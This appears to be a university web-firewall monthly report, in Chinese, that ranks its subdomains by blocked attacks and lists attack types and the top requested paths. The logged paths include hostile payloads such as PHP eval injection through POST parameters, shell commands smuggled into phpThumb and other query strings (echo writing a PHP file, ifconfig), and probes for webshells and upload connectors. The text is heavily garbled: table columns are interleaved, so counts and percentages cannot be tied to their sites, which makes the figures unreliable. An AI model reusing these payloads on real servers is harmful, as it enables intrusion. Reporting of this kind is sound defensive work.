webshell(814),协议4265 ) 违规(169),恶意 user-agents(93) 经济学院 疑似跨站攻击 10(jingji.xaufe.edu.(1367),一句话 4033 4.19%3.93%3.84%3.58%3.56%3.44%3.07%2.9% 较上月增加3064次,攻击高占比上升3.35% 较上月减少5412次,攻击高占比上升0.63% 较上月减少2498次,攻击高占比上升1.46% 较上月增加1255次,攻击中占比上升2.45% 较上月减少937次,攻击中占比上升1.77% 较上月减少5次,攻击占比中上升1.99% 较上月减少4484次,攻击中占比上升0.41% 较上月减中少6289 cn) webshell(1147),恶意 user-agents(588),协 议违规(347),SQL注 入攻击(259) 实验实训教学协议违规(930),疑似 管理中心 跨站攻击(884),命令 11 注入攻击(624),一句3972 (sxzx.xaufe.edu.c话webshell(473), n) SQL盲注攻击(288) 疑似跨站攻击 信息学院 (1128),一句话 webshell(727),SQL 12(xinxi.xaufe.edu.注入攻击(550),恶意3801 cn) user-agents(544),协 议违规(460) 疑似跨站攻击(969), 精品课程 命令注入攻击(948), 一句话 13(jpkc.xaufe.edu.webshell(885),协议3274 cn) 违规(209),恶意 user-agents(107) 一句话 团委 webshell(1426),疑似 跨站攻击(874),恶意 14(tuanwei.xaufe.euser-agents(282),协3187 ) 议违规(208),SQL注 入攻击(138) 一句话 继续教育学院webshell(1375),疑似 (培训中心)跨站攻击(1259),扫15(jxjy.xaufe.edu.c描工具(146),协议违3106 n) 规(132),恶意 user-agents(76) 中国(西安)丝协议违规(870),疑似 绸之路研究院跨站攻击(821),命令 16 注入攻击(641),一句2852 (sczl.xaufe.edu.c话webshell(367),漏 n) 洞防护(46) 疑似跨站攻击(770), 统计学院 一句话 webshell(679),命令 17(tongji.xaufe.edu注入攻击(524),协议2728 ) 违规(301),恶意 user-agents(190) 2.86%2.73%2.36%2.29%2.23%2.05%1.96% 次,攻击占比下降0.23% 较上月增加1885次,攻击中占比上升2.23% 较上月减少14336次,攻击中占比下降2.78% 较上月减少2681次,攻击中占比上升0.55% 较上月减少2023次,攻击中占比上升0.71% 较上月增加275次,攻击中占比上升1.37% 较上月增加48次,攻击中占比上升1.2% 较上月减少1363次,攻击中占比上升0.72% 命令注入攻击(706), 文学院 疑似跨站攻击(532), 一句话 18(wenxue.xaufe.ewebshell(316),文件2009 ) 限制(162),协议违规 (116) 疑似跨站攻击(671), 党委宣传部 一句话 webshell(611),协议 19(xuanchuan.xauf违规(130),恶意 1849 ) user-agents(124),漏 洞防护(102) 命令注入攻击(700), 基建处 疑似跨站攻击(398), SQL注入攻击(342), 20(jijian.xaufe.edu.一句话 1811 cn) webshell(271),恶意 user-agents(45) 疑似跨站攻击(655), 期刊管理中心一句话 webshell(457),协议 21(qikan.xaufe.edu违规(150),SQL注入1612 ) 攻击(106),恶意 user-agents(93) 疑似跨站攻击(443), 信息与教育技一句话 术中心 webshell(354),恶意 22(ietc.xaufe.edu.cuser-agents(273),文1455 n) 件限制(145),协议违 规(83) 疑似跨站攻击(354), 管理学院恶意 user-agents(334),
一 23(guanli.xaufe.ed句话webshell(223),1276 ) 协议违规(168),SQL 注入攻击(98) 协议违规(446),一句 科研处 话webshell(384),疑 24(keyan.xaufe.ed似跨站攻击(138),恶1275 ) 意user-agents(107), SQL注入攻击(81) 保卫处 疑似跨站攻击(490), 25(baowei.xaufe.e一句话 1268 ) webshell(354),命令 1.45%1.33%1.3%1.16%1.05%0.92%0.92%0.91% 较上月减少5511次,攻击中占比下降0.83% 较上月减少487次,攻击中占比上升0.62% 较上月减少1441次,攻击中占比上升0.31% 较上月减少1799次,攻击中占比上升0.12% 较上月减少2352次,攻击中占比下降0.11% 较上月减少607次,攻击中占比上升0.35% 较上月减少181次,攻击中占比上升0.48%较上月减少13526中次,攻击 注入攻击(254),扫描 工具(68),恶意 user-agents(29) 疑似跨站攻击(319), 人事处 扫描工具(223),一句 26(renshi.xaufe.ed话webshell(186),协1263 ) 议违规(161),恶意 user-agents(156) 命令注入攻击(537), 经济管理虚拟疑似跨站攻击(308), 仿真 一句话 27(xnfz.xaufe.edu.cwebshell(283),恶意1239 n) user-agents(33),协 议违规(29) 一句话 财务信息网 webshell(349),疑似 跨站攻击(289),协议 28(违规(153),恶意 1134 ) user-agents(147),扫 描工具(54) 一句话 学工部 webshell(672),疑似 跨站攻击(155),恶意 29
(xuegong.xaufe.user-agents(124),1113 ) SQL注入攻击(93), 漏洞防护(23) 疑似跨站攻击(351), 公共管理学院一句话 webshell(297),恶意 30(gongguan.xaufeuser-agents(249),协1107 ) 议违规(92),SQL注 入攻击(37) SQL注入攻击(345), 外国语学院首一句话 页 webshell(276),疑似 31(wgyxy.xaufe.ed跨站攻击(174),协议1044 ) 违规(108),SQL盲注 攻击(51) 扫描工具(233),一句 交流与合作 话webshell(227), 32(guojiao.xaufe.eSQL注入攻击(142),984 ) 协议违规(121),恶意 user-agents(106) 33审计处 协议违规(270),文件866 0.91%0.89%0.82%0.8%0.8%0.75%0.71%0.62% 占比下降3.58% 较上月减少1577次,攻击中占比上升0.05% 较上月增加529次,攻击中占比上升0.67% 较上月减少1308次,攻击中占比上升0.08% 较上月增加193次,攻击中占比上升0.52% 较上月减少190次,攻击中占比上升0.41% 较上月减少263次,攻击中占比上升0.35% 较上月减少2372次,攻击低占比下降0.31%较上月增低 (shenji.xaufe.ed限制(97),一句话 ) webshell(81),SQL盲 注攻击(75),恶意 user-agents(65) 一句话 纪委 webshell(415),疑似 跨站攻击(205),恶意 34(jiwei.xaufe.edu.user-agents(42),漏764 cn) 洞防护(38),SQL注 入攻击(21) 一句话 离退休人员管webshell(324),SQL 理处 注入攻击(172),疑似 35(litui.xaufe.edu.c跨站攻击(111),恶意749 n) user-agents(44),协 议违规(33) 一句话 法学院 webshell(201),恶意 user-agents(136),协 36(faxue.xaufe.edu议违规(100),疑似跨739 ) 站攻击(96),文件注 入攻击(72) 协议违规(412),恶意 教务管理 user-agents(86),漏 37(jwgl.xaufe.edu.洞防护(84),疑似跨723 cn) 站攻击(53),命令注 入攻击(28) 一句话 党政办公室 webshell(308),疑似 跨站攻击(296),协议 38(dangzheng.xauf违规(33),恶意 706 ) user-agents(26),漏 洞防护(14) 疑似跨站攻击(311), 教学评估中心一句话 webshell(255),协议 39(pjb.xaufe.edu.c违规(63),恶意 706 n) user-agents(33),文 件限制(11) 命令注入攻击(230), 后勤服务集团疑似跨站攻击(197), 40(houqin.xaufe.eSQL注入攻击(130),694 ) 恶意 user-agents(35),协 0.55%0.54%0.53%0.52%0.51%0.51%0.5% 加121次,攻击占比上升0.39% 较上月减少505次,攻击低占比上升0.16% 较上月减少928次,攻击低占比上升0.03% 较上月减少1889次,攻击低占比下降0.27% 较上月减少1172次,攻击低占比下降0.06% 较上月减少2646次,攻击低占比下降0.51% 较上月减少3039次,攻击低占比下降0.63% 较上月减少323次,攻击低占比上升0.19% 议违规(33) 一句话 党委组织部 webshell(326),疑似 跨站攻击(126),协议 41(zuzhibu.xaufe.e违规(100),恶意 665 ) user-agents(49),SQL 注入攻击(22) 一句话 高等教育研究webshell(289),疑似 所网站 跨站攻击(152),扫描 42(工具(78),恶意 625 ) user-agents(27),漏 洞防护(26) 疑似跨站攻击(317), 档案馆 一句话 webshell(147),协议 43
(dag.xaufe.edu.c违规(74),恶意 581 n) user-agents(31),SQL 注入攻击
(6) 疑似跨站攻击(156), 工会一句话 webshell(133),命令 44(gonghui.xaufe.e注入攻击(58),漏洞525 ) 防护(57),恶意 user-agents(45) 一句话 院报-在线阅读webshell(233),疑似 跨站攻击(65),SQL 45(xacyb.xaufe.edu注入攻击(56),文件520 ) 限制(53),恶意 user-agents(48) 校情民意管理疑似跨站攻击(180), 平台 一句话webshell(72), 46 漏洞防护(38),恶意425 (user-agents(31),协 ) 议违规(27) 一句话 合作发展处 webshell(213),疑似 跨站攻击(103),恶意 47(hzfz.xaufe.edu.cuser-agents(38),协424 n) 议违规(33),文件限 制(17) 两学一做学习疑似跨站攻击(138), 48教育专题网 恶意 339 0.48%0.45%0.42%0.38%0.37%0.31%0.31%0.24% 较上月减少372次,攻击低占比上升0.17% 较上月减少404次,攻击低占比上升0.14% 较上月增加45次,攻击低占比上升0.26% 较上月减少789次,攻击低占比下降0.02% 较上月增加61次,攻击低占比上升0.23% 较上月减少1088次,攻击低占比下降0.15% 较上月减少666次,攻击低占比下降0.02% 较上月减低少1852 (lxyz.xaufe.edu.cuser-agents(39),
一 n) 句话webshell(30), 文件限制(30),协议 违规(26) 一站式服务平协议违规(79),疑似 台 跨站攻击(73),命令 49 注入攻击(28),HTTP335 (my.xaufe.edu.c方法限制(27),跨站 n) 脚本攻击(24) 恶意 user-agents(136),协 wsbgt.xaufe.edu议违规(61),疑似跨 50(wsbgt.xaufe.站攻击(49),文件限301 ) 制(16),SQL注入攻 击(15) 0.24%0.22% 次,攻击占比下降0.43% 较上月减少1494次,攻击低占比下降0.32% 较上月减少1304次,攻击低占比下降0.27%
2.高级攻击威胁详情分析 2.1.DDOS攻击详情 未开通该服务,此项无数据。
2.2.CC攻击详情 优化中,后续会上线。
2.3.扫描攻击详情 本月未受到扫描攻击
3.安全风险详情分析 3.1.攻击类型详情分析 3.1.1命令注入攻击 【描述】仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载 数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致 信息泄露或者正常数据的破坏。
攻击风险等级:高。
【攻击详情】 序号
站点 首页1() 校友总会
2 (xiaoyou.xaufe.edu.c n) 体育部
3 ( ) 精品课程4()
5 图书馆 目的地址TOP5/utility/convert/data/config.inc.php、/plus/90sec.php、/plus/mytag_js.php?
aid=511348、/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php、/1.php/1.php、/index.php?
m=formguide&c=index&a=show&formid=1&siteid=1、/utility/convert/data/config.inc.php、/bbs/utility/convert/data/config.inc.php、/test.php/utility/convert/data/config.inc.php、/plus/mytag_js.php?
aid=511348、/plus/90sec.php、/1.php、/bbs/utility/convert/data/config.inc.php/utility/convert/data/config.inc.php、/1.php、/bbs/utility/convert/data/config.inc.php、/index.php?
m=formguide&c=index&a=show&formid=1&siteid=1、/fuck.php/info/80793.jspx、 攻击次数63011576 1367 948883 对比分析较上月减少70211次,攻击占比下降18.71% 较上月减少2009次,攻击占比上升0.04% 较上月减少1017次,攻击占比上升0.26% 较上月减少511次,攻击占比上升0.24% 较上月增 ()/utility/convert/data/config.inc.ph p、/1.php、 /bbs/utility/convert/data/config.i nc.php、/include/code/mp.php /upload.asp、/1.php、 商学院 /bbs/utility/convert/data/config.i 6
()nc.php、858 /utility/convert/data/config.inc.ph p、/plus/bakup.php /utility/convert/data/config.inc.ph 文学院 p、/1.php、
7 (wenxue.xaufe.edu.c
/bbs/utility/convert/data/config.i706 n) nc.php、/plus/bakup.php、 /11m.php /utility/convert/data/config.inc.ph p、/1.php、 基建处 /index.php?
m=formguide&c=inde
8 ()
x&a=show&formid=1&siteid=1、700 /bbs/utility/convert/data/config.i nc.php、/11m.php /1.php、 /utility/convert/data/config.inc.ph 中国(西安)丝绸
p、
9 之路研究院 /bbs/utility/convert/data/config.i641 ()nc.php、 /login_wall.php?
login=cmd、 /11m.php 实验实训教学管理/info/279.jspx、 10中心 /utility/convert/data/config.inc.ph624 ()p、/1.php、/plus/bakup.php、 /11m.php /utility/convert/data/config.inc.ph11经济管理虚拟仿真p、/1.php、537 ()/bbs/utility/convert/data/config.inc.php、/11m.php、/2016/gou.php /info/3531.jspx、/1.php、 统计学院 /bbs/utility/convert/data/config.i 12
()nc.php、524 /utility/convert/data/config.inc.ph p、/plus/bakup.php 研究生部 /User/ShowUser.asp?
xk=1201&a 13
(yanjiusheng.xaufe.emp;ID=421、 316 加626次,攻击占比上升0.56%较上月增加287次,攻击占比上升0.45%较上月减少460次,攻击占比上升0.16% 较上月减少661次,攻击占比上升0.09% 较上月增加235次,攻击占比上升0.34% 较上月减少68次,攻击占比上升0.24%较上月增加526次,攻击占比上升0.39%较上月减少288次,攻击占比上升0.13%较上月增加208 ) /User/ShowUser.asp?
xk=0202&a mp;ID=633、 /User/ShowUser.asp?
xk=1202&a mp;ID=258、 /User/ShowUser.asp?
xk=0202&a mp;ID=409、 /User/ShowUser.asp?
xk=0202&a mp;ID=249 /1.php、 保卫处 /bbs/utility/convert/data/config.i 14
(baowei.xaufe.edu.cnc.php、254 /index.php?
m=formguide&c=inde n) x&a=show&formid=1&siteid=
1、 /plus/bakup.php、/11m.php /1.php、 /bbs/utility/convert/data/config.i 后勤服务集团 nc.php、 /index.php?
m=formguide&c=inde 15
(houqin.xaufe.edu.cx&a=show&formid=1&siteid=1、230 n) /plus/bakup.php、 /utility/convert/data/config.inc.ph p 人事处 /index.php?
m=formguide&c=inde x&a=show&formid=1&siteid=
1、 16
(/11m.php、/2016/gou.php、 133 ) /5t/css/mp.php、/5t/data/mp.php /1.php、 /utility/convert/data/config.inc.ph 学科办 p、 17
(xuekeban.xaufe.edu/admin.php/module/action/para92 m1/$%7B@eval($_POST%5Bc%5D ) )%7D、/admin_login.php、 /bbs/utility/convert/data/config.i nc.php /vendor/phpunit/phpunit/src/Util 本科招生信息网
/PHP/eval-stdin.php、 /yp/product.php?
pagesize=${${@ 18(zhaosheng.xaufe.edeval%28$_POST[-62]%29}}、 90 ) /admin_login.php、/conn.php、 /css/ing/admin_login.php 工会 /utility/convert/data/config.inc.ph 19
(gonghui.xaufe.edu.p、/plus/mytag_js.php、 58 cn) //vendor/phpunit/phpunit/src/Uti 次,攻击占比上升0.2% 较上月增加7次,攻击占比上升0.1% 较上月增加220次,攻击占比上升0.17% 较上月减少136次,攻击占比上升0.02% 较上月减少1193次,攻击占比下降0.32% 较上月减少12次,攻击占比上升0.03%较上月增加44次,攻击占比 l/PHP/eval-stdin.php、 /admin/snhxc/date.php、 /admin/snhxg/date.php /fetionlist.php、 /get_online_user.php?
k=e08c63f3 教务 3cbc7ba433d27ef77399d784&acti 20
(jiaowu.xaufe.edu.con=show4&uname=;echo%20%2752 n) vulnable%27>vul.php;、 /qqlist.php、/radtest.php、 /sinawblist.php /vendor/phpunit/phpunit/src/Util 经济学院 /PHP/eval-stdin.php、 21
()/login.action、52 //vendor/phpunit/phpunit/src/Uti l/PHP/eval-stdin.php /?
param=cmd.exe、 /admin/scripts/tinymce/jscripts/ti ny_mce/plugins/ibrowser/scripts/ phpThumb/phpThumb.php?
src=./ index.php&fltr[]=blur|5;echo+082 119f75623eb7abd7bf357698ff66c >cache/ix;、 /cms/plugins/content/jthumbs/in cludes/phpThumb.php?
src=./inde 审计处 x.php&fltr[]=blur|5;echo+082119f 75623eb7abd7bf357698ff66c>cac 22
(he/ix;、 32 )mon/scripts/phpThumb/php Thumb.php?
src=./index.php&fltr[] =blur|5;echo+082119f75623eb7a bd7bf357698ff66c>cache/i x;、 _hotornot2/ph pthumb/phpThumb.php?
src=./ind ex.php&fltr[]=blur|5;echo+08211 9f75623eb7abd7bf357698ff66c>c ache/ix; /xxjsjy.aspx?
zgh=2002010283&xm 教务管理 =陈淑芳&gnmkdm=N122309、 23
()/xscjcx.aspx?
xh=1602310320&xm28 =%D5%D4%CF%B2%D1%C7&gnm kdm=N121605 24一站式服务平台/cjtyrz/reg.action、/reg.action28() 上升0.04% 较上月增加35次,攻击占比上升0.03%较上月减少38次,攻击占比上升0.01% 较上月增加22次,攻击占比上升0.02% 较上月增加20次,攻击占比上升0.02%较上月增加10次, /radtest.php、 党委宣传部 //vendor/phpunit/phpunit/src/Uti l/PHP/eval-stdin.php、 25(xuanchuan.xaufe.e/fetionlist.php、/qqlist.php、 24 ) /ount/ountlist.php?
type=lis t&ount=;ifconfig; /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、/x.php、 团委 //vendor/phpunit/phpunit/src/Uti 26
(tuanwei.xaufe.edu.l/PHP/eval-stdin.php、 21 cn) /login.action、 /wp-content/themes/twentyeleve n/cons.php //vendor/phpunit/phpunit/src/Uti 新闻网
27 l/PHP/eval-stdin.php、19 ()/vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、/login.action /vendor/phpunit/phpunit/src/Util
28期刊管理中心/PHP/eval-stdin.php、/、12 ()//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 信息与教育技术中 29心 /vendor/phpunit/phpunit/src/Util11 ()/PHP/eval-stdin.php /zftal-mobile/webservice/oa/Emai30(jlInformationXMLService、
9 )/zftal-mobile/webservice/newmobile/MobileLoginXMLService/vendor/phpunit/phpunit/src/Util 校情民意管理平台/PHP/eval-stdin.php、31()/login.action、8 //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 管理学院 //vendor/phpunit/phpunit/src/Uti 32(l/PHP/eval-stdin.php、
7 )/guanlixueyuan/admin_edit.asp?
i d=&pid=154&ppid=23&pageno= 攻击占比上升0.01% 较上月减少23次,攻击占比上升0.01% 较上月减少14次,攻击占比上升0.01% 较上月减少126次,攻击占比下降0.03%较上月减少5次,攻击占比下降0%较上月减少865次,攻击占比下降0.26%较上月减少9次,攻击占比下降0% 较上月减少10次,攻击占比下降0% 较上月减少6次,攻击占比上升0.01% 院报-在线阅读 /vendor/phpunit/phpunit/src/Util 33()/PHP/eval-stdin.php、/cpanel
5 两学一做学习教育 34专题网 /vendor/phpunit/phpunit/src/Util4 ()/PHP/eval-stdin.php 财务信息网35() /login.action、/vendor/phpunit/phpunit/src/Util3/PHP/eval-stdin.php 公共管理学院 36(gongguan.xaufe.ed//vendor/phpunit/phpunit/src/Uti3 ) l/PHP/eval-stdin.php //vendor/phpunit/phpunit/src/Uti37信息学院l/PHP/eval-stdin.php、
3 ()/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 党政办公室 //vendor/phpunit/phpunit/src/Uti 38(dangzheng.xaufe.edl/PHP/eval-stdin.php、
2 ) /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php 一卡通39 /vendor/phpunit/phpunit/src/Util2 ()/PHP/eval-stdin.php 交流与合作40(guojiao.xaufe.edu.c/vendor/phpunit/phpunit/src/Util2 n)/PHP/eval-stdin.php 继续教育学院(培//vendor/phpunit/phpunit/src/Uti 41训中心) l/PHP/eval-stdin.php、
2 ()/vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php 马克思主义学院/upload/201810/11/2018101108542(marxism.xaufe.edu.3033580.docx、2 cn)/upload/201810/11/201810110855083142.docx 较上月减少0次,攻击占比下降0%较上月减少13次,攻击占比下降0.01%较上月减少22次,攻击占比下降0.01%较上月减少8次,攻击占比下降0%较上月减少20次,攻击占比下降0.01%较上月减少10次,攻击占比下降0%较上月减少16次,攻击占比下降0.01%较上月减少12次,攻击占比下降0%较上月减少9次,攻击占比下降0% 较上月--,攻击占比-- 43OA办公平台//data/data/index.php2() 法学院44 /eWebeditor/UploadFile/20181011 ()5121718913.doc 国有资产管理处45 /website/new_show.aspx?
amp%31 ()Bid=3861&wt=
1 纪委46 //vendor/phpunit/phpunit/src/Uti1 ()l/PHP/eval-stdin.php 科研处47 //vendor/phpunit/phpunit/src/Uti1 ()l/PHP/eval-stdin.php 48(ne./vendor/phpunit/phpunit/src/Util1 ) /PHP/eval-stdin.php 49(/vendor/phpunit/phpunit/src/Util1)/PHP/eval-stdin.php 较上月减少16次,攻击占比下降 0.01%较上月减少8次,攻击占比下降0%较上月减少7次,攻击占比下降0%较上月减少10次,攻击占比下降0%较上月减少12次,攻击占比下降0%较上月减少12次,攻击占比下降0%较上月减少5次,攻击占比下降0% 3.1.2一句话webshell 【描述】Web系统中,远程攻击者会通过某种手段在页面中植入一句话木马, 之后通过菜刀等工具连接,进而控制服务器。
攻击风险等级:高。
【攻击详情】 序号站点首页 1() 目的地址TOP5//config/AspCms_Config.asp、//inc/config.asp、/plus/mytag_js.php?
aid=9090、 攻击次数5050 对比分析较上月减少2296次,攻击占 //css.asp、//admin/index.asp //config/AspCms_Config.asp、 新闻网 //inc/config.asp、//css.asp、
2 ()
/config/AspCms_Config.asp、 3246 /plus/mytag_js.php?
aid=9090 本科招生信息网//config/AspCms_Config.asp、
3 (zhaosheng.xaufe.ed/index.php、/config.php、 2361 ) /xiaoy.php、//inc/config.asp 研究生部 //config/AspCms_Config.asp、
4 (yanjiusheng.xaufe.e
//inc/config.asp、/config.php、
1504
)
//admin/index.asp、//css.asp
团委
//config/AspCms_Config.asp、
5
(tuanwei.xaufe.edu.
//inc/config.asp、
6 训中心) /plus/mytag_js.php?
aid=9090、1375 ()/config.php、 /plus/mytag_js.php?
aid=511348 教务 //config/AspCms_Config.asp、
7 (jiaowu.xaufe.edu.c
//inc/config.asp、/index.php、1231 n) //css.asp、//data/data.asp //config/AspCms_Config.asp、 图书馆 /config/AspCms_Config.asp、
8 ()
//inc/config.asp、/config.php、1219 /plus/mytag_js.php?
aid=511348 //config/AspCms_Config.asp、 经济学院 //inc/config.asp、
9 //admin/index.asp、 1147 ()
/plus/mytag_js.php?
aid=9527、 /config/AspCms_Config.asp 体育部 //config/AspCms_Config.asp、 10
(//inc/config.asp、//css.asp、 1105 比上升1.4%较上月减少1423次,攻击占比上升0.92%较上月减少315次,攻击占比上升0.89%较上月增加236次,攻击占比上升0.69%较上月减少432次,攻击占比上升0.47%较上月增加306次,攻击占比上升0.67%较上月增加411次,攻击占比上升0.64%较上月减少170次,攻击占比上升0.46%较上月减少1496次,攻击占比上升0.03%较上月增加297 ) /config/AspCms_Config.asp、 //data/data.asp //config/AspCms_Config.asp、 精品课程 //inc/config.asp、//css.asp、 11
()//admin/index.asp、 885 //data/data.asp 商学院 //config/AspCms_Config.asp、 12 //inc/config.asp、/config.php、
822 ()/web.php、/xiaoy.php 校友总会 //config/AspCms_Config.asp、 /plus/mytag_js.php?
aid=9090、13(xiaoyou.xaufe.edu.c/index.php、//inc/config.asp、814 n)/plus/mytag_js.php?
aid=9191 //config/AspCms_Config.asp、 信息学院 //inc/config.asp、 14()//admin/index.asp、//css.asp、727 /config/AspCms_Config.asp //config/AspCms_Config.asp、 统计学院 //inc/config.asp、 15()//admin/index.asp、//css.asp、679 /config.php 学工部 /index.php、/config.php、 /xiaoy.php、 16(xuegong.xaufe.edu./plus/ad_js.php?
aid=8888、 672 cn)/plus/mytag_js.php?
aid=9090 党委宣传部 //config/AspCms_Config.asp、 //inc/config.asp、//css.asp、 17
(xuanchuan.xaufe.e//admin/index.asp、 611 ) //data/data.asp 实验实训教学管理//config/AspCms_Config.asp、 18中心 //inc/config.asp、 473 //plus/mytag_js.php?
aid=9090、 ()/config/AspCms_Config.asp、/.php 19期刊管理中心 //config/AspCms_Config.asp、457 次,攻击占比上升0.54%较上月减少48次,攻击占比上升0.36%较上月增加440次,攻击占比上升0.47%较上月减少129次,攻击占比上升0.3%较上月减少3711次,攻击占比下降0.83%较上月减少236次,攻击占比上升0.21%较上月增加234次,攻击占比上升0.35%较上月减少269次,攻击占比上升0.17%较上月增加117次,攻击占比上升0.23%较上月减 () //inc/config.asp、//admin/index.asp、/plus/mytag_js.php?
aid=511348、/plus/mytag_js.php?
aid=9090 纪委 //config/AspCms_Config.asp、 20 //inc/config.asp、/config.php、
415 ()/index.php、/.php 科研处 /config.php、 21 //config/AspCms_Config.asp、384 ()/xiaoy.php、/index.php、/web.php 中国(西安)丝绸//config/AspCms_Config.asp、 22之路研究院 //inc/config.asp、//css.asp、367 ()//admin/index.asp、 //data/data.asp 保卫处 //config/AspCms_Config.asp、 //inc/config.asp、23(baowei.xaufe.edu.c//admin/index.asp、//css.asp、354 n)//data/data.asp //config/AspCms_Config.asp、 信息与教育技术中//inc/config.asp、 24心 /config/AspCms_Config.asp、 354 ()/config.php、 /plus/mytag_js.php?
aid=9090 财务信息网25() //config/AspCms_Config.asp、//inc/config.asp、/plus/mytag_js.php?
aid=9090、349//admin/index.asp、//css.asp 党委组织部 //config/AspCms_Config.asp、 26(zuzhibu.xaufe.edu.c//inc/config.asp、/config.php、326 n) /index.php、//admin/index.asp 离退休人员管理处//config/AspCms_Config.asp、 27 /config.php、/xiaoy.php、 324 ()/index.php、/web.php 少263次,攻击占比上升0.11%较上月增加124次,攻击占比上升0.21%较上月减少38次,攻击占比上升0.15%较上月减少205次,攻击占比上升0.09%较上月减少3703次,攻击占比下降0.98% 较上月减少471次,攻击占比下降0% 较上月减少302次,攻击占比上升0.05%较上月增加26次,攻击占比上升0.14%较上月减少60次,攻击占比上升0.11% 文学院 //config/AspCms_Config.asp、 28(wenxue.xaufe.edu.c//inc/config.asp、/config.php、316 n) /index.php、//css.asp 党政办公室 //config/AspCms_Config.asp、 //inc/config.asp、//css.asp、 29
(dangzheng.xaufe.ed/inc/config.asp、 308 ) //admin/index.asp 公共管理学院 //config/AspCms_Config.asp、 //inc/config.asp、
30(gongguan.xaufe.ed//admin/index.asp、//css.asp、297 ) //data/data.asp 高等教育研究所网//config/AspCms_Config.asp、31站()//inc/config.asp、/config.php、289 //admin/index.asp、/index.php /config.php、/index.php、经济管理虚拟仿真/xiaoy.php、32()/plus/mytag_js.php?
aid=8080、283 /.php 外国语学院首页//config/AspCms_Config.asp、 33(//inc/config.asp、/config.php、276 ) /index.php、//css.asp 基建处 //config/AspCms_Config.asp、 34 /config.php、/index.php、 271 ()
//inc/config.asp、/config.inc.php //config/AspCms_Config.asp、 教学评估中心 //inc/config.asp、 35 //plus/mytag_js.php?
aid=9527、
255 ()//plus/mytag_js.php?
aid=9090、 /config/AspCms_Config.asp 院报-在线阅读 //config/AspCms_Config.asp、 36 //inc/config.asp、/config.php、
233 ()/index.php、//css.asp 较上月增加89次,攻击占比上升0.16%较上月减少545次,攻击占比下降0.04%较上月增加60次,攻击占比上升0.14%较上月增加35次,攻击占比上升0.13%较上月减少84次,攻击占比上升0.09%较上月增加54次,攻击占比上升0.13%较上月减少112次,攻击占比上升0.07%较上月增加25次,攻击占比上升0.11%较上月增加188次,攻击占比上升 交流与合作 //config/AspCms_Config.asp、 /config.php、/index.php、37(guojiao.xaufe.edu.c/plus/mytag_js.php?
aid=511348、227 n)//inc/config.asp 管理学院 //config/AspCms_Config.asp、 //inc/config.asp、 38(//plus/mytag_js.php?
aid=9527、223 ) //css.asp、//data/data.asp 合作发展处 //config/AspCms_Config.asp、 39 /index.php、/config.php、 213 ()
//css.asp、//data/data.asp //config/AspCms_Config.asp、 法学院 //inc/config.asp、//css.asp、 40
()//data/data.asp、 201 //admin/index.asp 人事处 //config/AspCms_Config.asp、 //inc/config.asp、/、
41(//plus/mytag_js.php?
aid=9090、186 )//images/css/Thumb.asp //config/AspCms_Config.asp、 档案馆 /config/AspCms_Config.asp、/、 42()//admin/index.asp、 147 //data/data.asp 党委组织部党校/config.php、/index.php、43()/xiaoy.php、/.php、140 //config/AspCms_Config.asp 工会 //config/AspCms_Config.asp、 //inc/config.asp、//css.asp、 44
(gonghui.xaufe.edu.//admin/index.asp、 133 cn)//data/data.asp 校医院 /config.php、/index.php、 45(/xiaoy.php、/.php、 130 ) //webconfig.txt.php 0.16%较上月减少1056次,攻击占比下降0.23%较上月减少161次,攻击占比上升0.04%较上月减少18次,攻击占比上升0.08%较上月减少97次,攻击占比上升0.05%较上月减少113次,攻击占比上升0.04%较上月增加34次,攻击占比上升0.08%较上月增加23次,攻击占比上升0.06%较上月减少307次,攻击占比下降0.03%较上月增加83次,攻击占比 第二次党代会专题//config/AspCms_Config.asp、 46网 //inc/config.asp、85 ()//admin/index.asp、//css.asp、 //data/data.asp 审计处 //config/AspCms_Config.asp、 47(//inc/config.asp、/config.php、81 ) /index.php、/web.php //config/AspCms_Config.asp、 校情民意管理平台//plus/mytag_js.php?
aid=9527、 48 //inc/config.asp、 72 ()/plus/mytag_js.php?
aid=9090、 //data/%235Dp8Gh.asp 后勤服务集团 //config/AspCms_Config.asp、 49
(houqin.xaufe.edu.c//admin/index.asp、//css.asp、32 n) //data/data.asp、//inc/config.asp 两学一做学习教育//config/AspCms_Config.asp、 50专题网 //inc/config.asp、 30 //plus/mytag_js.php?
aid=9527、 ()/plus/mytag_js.php?
aid=9090、/ 上升0.08%较上月增加63次,攻击占比上升0.05%较上月减少89次,攻击占比上升0.01%较上月减少367次,攻击占比下降0.08%较上月减少223次,攻击占比下降0.06%较上月减少620次,攻击占比下降0.18% 3.1.3文件限制 【描述】由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件 类型,导致允许攻击者向某个可通过Web访问的目录上传任意文件,会让攻 击者注入危险内容或恶意代码,并在服务器上运行。
攻击风险等级:高。
【攻击详情】 序号站点首页 1() 目的地址TOP5/tuanwei/mailto%3Aadmin%40ec、/tuanwei/mailto%3Atuanwei092% 攻击次数3133 对比分析较上月增加351次,攻击占 、/conn.inc、/connectconnect.inc、/sqlsql.inc 教务 //include/dialog/select_soft_post. php、/HYTop.mdb、/conn.inc、
2 (jiaowu.xaufe.edu.c
/connconn.inc、 636 n)/connectconnect.inc 商学院 /connect.inc、/database.inc、 3()/databasedatabase.inc、/db.inc、183 /dbdb.inc 文学院 /API/api.config、 /DATA/zblog.mdb、/DB/ddb.mdb、
4 (wenxue.xaufe.edu.c
/Data/Ylmv_data.mdb、 162 n)/DataBackup/dvbbs.mdb /HYTop.mdb、 /include/dialog/select_soft_post. php、 本科招生信息网//skin/default/images/logo.gif/1.p
5 (zhaosheng.xaufe.edhp、 151 ) //include/dialog/select_soft_post. php、 /UploadFiles/.c er //skin/default/images/logo.gif/1.p hp、 /admin/fckeditor/editor/filemana ger/browser/default/connectors/a sp/connector.asp?
Command=File Upload&Type=File&CurrentFolder =%2F、 信息与教育技术中
/admin/fckeditor/editor/filemana
6 心 ger/connectors/asp/connector.asp145 ?
Command=FileUpload&Type=Fil ()e&CurrentFolder=%2F、 /admin/fckeditor/editor/filemana ger/connectors/asp/upload.asp?
